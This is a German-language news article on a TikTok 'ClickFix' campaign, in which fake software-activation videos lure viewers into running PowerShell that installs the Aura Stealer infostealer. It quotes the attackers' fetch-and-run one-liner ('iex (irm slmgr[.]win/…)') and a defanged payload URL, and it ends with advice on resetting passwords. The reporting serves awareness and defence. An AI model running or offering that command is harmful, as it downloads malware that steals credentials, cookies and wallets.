Dataconomy DE
Subscribe
No Result
View All Result
Dataconomy DE
Subscribe
No Result
View All Result
Dataconomy DE
No Result
View All Result

Die neueste Betrugsmasche von TikTok zeigt Benutzern, wie sie ihre eigenen PCs infizieren können

byEmre Çıtak
Oktober 20, 2025
in Cybersicherheit, Nachricht
Home Nachricht Cybersicherheit
Share on FacebookShare on Twitter
Google Preferred Source

Cyberkriminelle verbreiten auf TikTok Malware, die Informationen stiehlt, indem sie Videos verwenden, die als Anleitungen zur Aktivierung kostenloser Software getarnt sind. Entsprechend BleepingComputerISC-Handler Xavier Mertens identifizierte die laufende Kampagne, die eine Social-Engineering-Methode namens ClickFix-Angriff einsetzt, um Computersysteme zu infizieren. Die Videos, beobachtet von BleepingComputerbehaupten, Anweisungen zum Aktivieren legitimer Software wie Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro und Discord Nitro bereitzustellen. Die Kampagne wirbt auch für fiktive Dienste, darunter „Netflix Premium“ und „Spotify Premium“. Mertens stellte fest, dass diese Aktivität weitgehend mit einer Kampagne übereinstimmt, die das Sicherheitsunternehmen Trend Micro bereits im Mai beobachtet hatte. Die Videos verwenden eine Social-Engineering-Technik, die scheinbar gültige Lösungen oder Anweisungen präsentiert, um Benutzer dazu zu verleiten, ihre eigenen Maschinen zu kompromittieren. Dieser ClickFix-Angriff verleitet Benutzer dazu, bösartige PowerShell-Befehle auszuführen. In jedem Video wird ein einzeiliger Befehl angezeigt, z. B. „iex (irm slmgr[.]win/photoshop)` und weist die Betrachter an, es mit Administratorrechten auszuführen. Der Programmname in der URL wird so geändert, dass er mit der Software übereinstimmt, die imitiert wird. Ein gefälschter Windows-Leitfaden würde eine URL verwenden, die „Windows“ anstelle von „Photoshop“ enthält. Wenn der Befehl ausgeführt wird, stellt PowerShell eine Verbindung zur Remote-Site „slmgr“ her[.]win`, um ein weiteres PowerShell-Skript abzurufen und auszuführen. Dieses Skript lädt zwei ausführbare Dateien von Cloudflare-Seiten herunter. Die erste, von „https://file-epq[.]Seiten[.]dev/updater.exe ist eine Variante der Aura Stealer-Malware. Dieser Infostealer ist darauf ausgelegt, gespeicherte Browser-Anmeldeinformationen, Authentifizierungscookies, Kryptowährungs-Wallet-Daten und andere Anwendungsanmeldeinformationen zu sammeln. Die gestohlenen Daten werden dann an die Angreifer hochgeladen und ermöglichen ihnen so Zugriff auf die Konten des Opfers. Im Rahmen des Angriffs wird auch eine zweite Nutzlast, „source.exe“, heruntergeladen. Laut Mertens kompiliert diese ausführbare Datei den Code mithilfe des in .NET integrierten Visual C#-Compilers („csc.exe“) selbst. Der resultierende Code wird anschließend direkt in den Speicher eingefügt und gestartet. Der konkrete Zweck dieser zusätzlichen Nutzlast bleibt unklar. Benutzer, die diese Schritte ausgeführt haben, sollten davon ausgehen, dass alle ihre Anmeldeinformationen gefährdet sind. Die empfohlene Vorgehensweise besteht darin, die Passwörter auf allen von ihnen genutzten Websites und Diensten sofort zurückzusetzen, um unbefugten Kontozugriff und weiteren Datendiebstahl zu verhindern. ClickFix-Angriffe sind im letzten Jahr immer beliebter geworden und werden zur Verbreitung verschiedener Malware-Stämme in Ransomware- und Kryptowährungsdiebstahlkampagnen eingesetzt. Als allgemeine Regel gilt, dass Benutzer niemals Text von einer Website kopieren und ihn in einem Betriebssystemdialogfeld ausführen sollten. Diese Empfehlung umfasst die Adressleiste des Datei-Explorers, die Eingabeaufforderung, PowerShell-Eingabeaufforderungen, das macOS-Terminal und Linux-Shells.


Hervorgehobener Bildnachweis

Tags: BetrugTikTok

Related Posts

Sony enthüllt God of War: Laufey für PS5

Sony enthüllt God of War: Laufey für PS5

Juni 3, 2026
Microsoft stellt die Surface RTX Spark Dev Box für KI-Workloads vor

Microsoft stellt die Surface RTX Spark Dev Box für KI-Workloads vor

Juni 3, 2026
Anthropic lädt 150 weitere Organisationen zum Project Glasswing ein

Anthropic lädt 150 weitere Organisationen zum Project Glasswing ein

Juni 3, 2026
Android Drop im Juni bringt Sicherheitstools und intelligentere Suchfunktionen

Android Drop im Juni bringt Sicherheitstools und intelligentere Suchfunktionen

Juni 3, 2026
Microsoft stellt Project Solara für eine Agent-First-Zukunft vor

Microsoft stellt Project Solara für eine Agent-First-Zukunft vor

Juni 3, 2026
X führt Videoantworten im TikTok-Stil für Beiträge ein

X führt Videoantworten im TikTok-Stil für Beiträge ein

Juni 3, 2026

Recent Posts

  • Die Deaktivierungsregeln für die KI-Suche von Google lösen die Einführung des Enviromates-Browsers aus
  • Sony enthüllt God of War: Laufey für PS5
  • Forscher erschließen 20-fache Verstärkung bei Experimenten mit ultraschnellen Lasern
  • Microsoft stellt die Surface RTX Spark Dev Box für KI-Workloads vor
  • Berichten zufolge sind Intels neue Core-Ultra-Chips Mangelware

Recent Comments

Es sind keine Kommentare vorhanden.
Dataconomy DE

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Home
  • Sample Page

Follow Us

  • Home
  • Sample Page
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.